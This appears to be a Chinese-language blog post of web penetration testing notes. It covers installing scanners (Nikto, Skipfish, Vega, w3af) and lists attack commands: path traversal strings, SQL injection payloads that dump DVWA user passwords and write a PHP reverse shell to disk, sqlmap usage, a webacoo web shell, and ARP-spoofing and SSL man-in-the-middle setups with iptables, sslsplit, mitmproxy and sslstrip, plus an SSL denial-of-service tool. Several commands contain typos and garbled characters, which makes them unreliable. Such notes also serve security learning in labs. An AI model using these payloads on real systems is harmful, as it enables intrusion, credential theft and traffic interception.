web渗透

扫描工具

  1. Nikto版本更新:nikto –update
  2. 查看使用插件:nikto –list-plugins
  3. 扫描目标: 
        1. nikto –host http://www.baidu.com/web/
        2. nikto –host 19168.1.109 –port 80
        3. nikto –host www.baidu.com –port 448443,995 –ssl
        4. nikto –host 12.168.1.103 –port 80 –evasion 167
        5. nmap –p80 192.168.1.0/24 –oG - | nikto –host –
        6. nikto –host https://www.baidu.com –useproxy http:locallhost:8087

skipfish漏洞工具使用

  1. Skipfish –o test http://www.ebay.com/usr/
  2. Skipfish –o test @url.txt
  3. 通过自带字典扫描;
    1. 找到字典:dpkg –L skipfish | grep wl
    2. Skipfish –o test –S /usr/share/skipfish/dictionaries/minimal.wl http:1.1.1.1 
  4. 利用提取cooking进行登录扫描:
    1. Skipfish –A user:pass –o test http://1.1.1.1
    2. Skipfish –C “name=val” –o test http://1.1.1.1

vega工具使用

  1. 官网下载:https://subgraph.com/vega/download/
  2. 进入压缩包存放目录,输入命令:

unzip VegaBuild-linux.gtk.x86_64.zip(压缩包的名字) -d vega/

  1. 安装后,输入命令 ./Vega运行vega
  2. 若报错,可能是Java版本过高,我们需要调低Java版本,输入命令:

update-alternatives --config java

      安装W3af

  1. 更新源:

打开更新源列表vi /etc/apt/sources.list

#更改更新源

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

deb http://ftp.de.debian.org/debian buster main

#更新命令:

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade y

  1. 下载:git clone https://github.com/andresriancho/w3af.git
  2. 安装pybloomfiltermmap 命令:apt install -y python-pybloomfiltermmap
  3. 修改配置文件:
    1. vim w3af/core/controllers/dependency_check/requirements.py
        1. PIPDependency(‘pybloomfilter’, ‘pybloomfiltermmap’, ‘0.3.15’)
        2. PIPDependency(‘OpenSSL’, ‘pyOpenSSL’, ‘16.2.0’)
        3. PIPDependency(‘lxml’, ‘lxml’, ‘3.7.1’)
    2. vim w3af/core/controllers/dependency_check/platforms/mac.py 
        1. MAC_CORE_PIP_PACKAGES.remove(PIPDependency(‘pybloomfilter’, ‘pybloomfiltermmap’, ‘0.3.15’)
  4. 安装python-pip:apt-get install python-setuptools python-pip
  5. /tmp目录生成脚本:(1)./w3af_gui     (2)./w3ad_console

(3)./tmp/w3af_dependency_install.sh

  1. 更新npm:(1)npm install –g retire@2.0.32npm update –g retire
  2. 使用命令版:(1./w3af_console   2sudo pip install xdot==0.6
  3. 安装图形化插件:
    1. 1.下载deb二进制包:
        1. wget http://ftp.br.debian.org/debian/pool/main/p/pywebkitgtk/python-webkit_1.1.8-3_amd64.deb
        2. wget http://ftp.br.debian.org/debian/pool/main/w/webkitgtk/libjavascriptcoregtk-1.0-0_2.4.11-3_amd64.deb
        3. wget http://ftp.br.debian.org/debian/pool/main/p/python-support/python-support_1.0.15_all.deb
        4. wget http://ftp.br.debian.org/debian/pool/main/w/webkitgtk/libwebkitgtk-1.0-0_2.4.11-3_amd64.deb
    2. 依次安装二进制包:
        1. dpkg -i libjavascriptcoregtk-1.0-0_2.4.11-3_amd64.deb
        2. dpkg -i python-support_1.0.15_all.deb
        3. dpkg -i libwebkitgtk-1.0-0_2.4.11-3_amd64.deb
        4. dpkg -i python-webkit_1.1.8-3_amd64.deb
    3. 修复依赖: apt-get -f install –y
  4. 运行图像化:./w3af_gui
  5. 如果缺失安装:apt-get install python-getsourceview2

手动漏洞挖掘

1. 字典以及破解字符目录:/usr/share/wfuzz/wordlist/

2. url测试结尾追加:

• ?file=../../../../etc/passwd

• ?page=file:///etc/passwd

• ?home=main.cgi

 • ?page=http://www.a.com/1.php

http://1.1.1.1/../../../../dir/file.txt

• “.” “%00” #绕过文件扩展名

  1. SQLဳ注入:
    1. ' union select database(),substring_index(USER(),"@",1)-- 
    2. @@datadir̵、@@hostname̵、@@VERSION̵、user()、@@version_compile_os、database()
    3. 链接字符串:CONCAT_WS(CHAR(32,58,32),user(),database(),version())
    4. • ‘ union select table_name,table_schema from information_schema.tables--+
    5. • ' UNION select table_schema,count(*) FROM information_Schema.tables group by table_schema –
    6. • ' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'--+
    7. • ' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users’--+
    8. • ' union select user,password from dvwa.users--+
    9. • ' union select user,password from users--+
    10. • ' union select null, concat(user,0x3a,password) from users--+
  2. 使用john破解密码的hash获得密码明文:
    1. john --format=raw-MD5 dvwa.txt
  3. 读取文件: • ' union SELECT null, load_file('/etc/passwd')--+
  4. 写入文件:• ' union select null,"" INTO DUMPFILE "/var/ www/a.php" --+
  5. Mysql账号:
    1. cat php-revers-shell.php | xxd -ps | tr -d ‘\n’
    2. • ' union select null, (0x3c3f706870) INTO DUMPFILE '/tmp/x.php'—
  6. 保存下载数据库:
    1. • ' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/ tmp/a.db'—

Sqlmap注入  

1. • sqlmap -h / -hh / -u

2.  sqlmap -d "mysql://user:password@192.168.20.10:3306/dvwa" -f --users --banner --dbs --schema –a

3. sqlmap -u  url  --data="name=value&pwd=value"后参数:

      • --current-user

• --current-db

• --hostname

 • --users

• --privileges -U username

 • --roles

 • --dbs

• --tables, --exclude-sysdbs –D dvwa

• -T users -D dvwa -C user –columns

Webacoo 控制工具

  1. 生成服务端:• webacoo -g -o a.php
  2. 客户端连接:• webacoo -t -u http://1.1.1.1/a.php

ssl证书攻击

1. 查看证书:openssl s_client –connect www.baidu.com

2. 查看tls支持的证书密码:sslscan –tlsall www.taobao.com:443

3. 检查证书:

sslscan –show-certificate –no-ciphersuites www.taobao.com

sslyze –regular www.taobao.com

nmap --script=ssl-enum-ciphers.nse www.taobao.com

           网站:https://www.ssllabs.com

4. 根据证书 访问:openssl s_client –tls1_2 –cipher ‘加密算法’ –connect url

5. 伪造证书:

a.生成证书私钥: openssl genrsa -out ca.key 2048

b.利用私钥生成证书: openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

6.ssl/tls  中间人攻击iptables

a. 启动路由:sysctl –w net.ipv4.ip_forward=1(/proc/sys/net/ipv4/ip_forward)

b. iptables端口转发规则(将劫持的流量数据转发到指定端口):

• iptables -t nat -F (清除端口规则)

• iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

• iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443 • iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA

• iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS

• iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS

• iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S

• Iptables -t nat –L

 C. 启动SSLsplit开始劫持: arpspoof –I eth0 –t 192.168.0.115 192.168.0.1

 d. 生成劫持信息日志:sslsplit –D –l connect.log –j /root/test –s test/ -k ca.key –c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

6.ssl/tls  中间人攻击Mitmproxy

      a. iptables –t nat –F (清除端口规则)

         b. iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080

         iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --toport 8080

7. SSLstrip(客户端中间人之间明文传输): sslstrip -l 8080

8.流量占用攻击:thc-ssl-dos ip

使用arpspoof实施中间人攻击

用omnipeek抓包:

  1. Windowns端命令:arp –d

                Ping ip

  1. Arp筛选出数据包:
          1. 1. 右键发送,修改适配器
          2. 2. 设置数据包数据。

命令:dsniff

  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值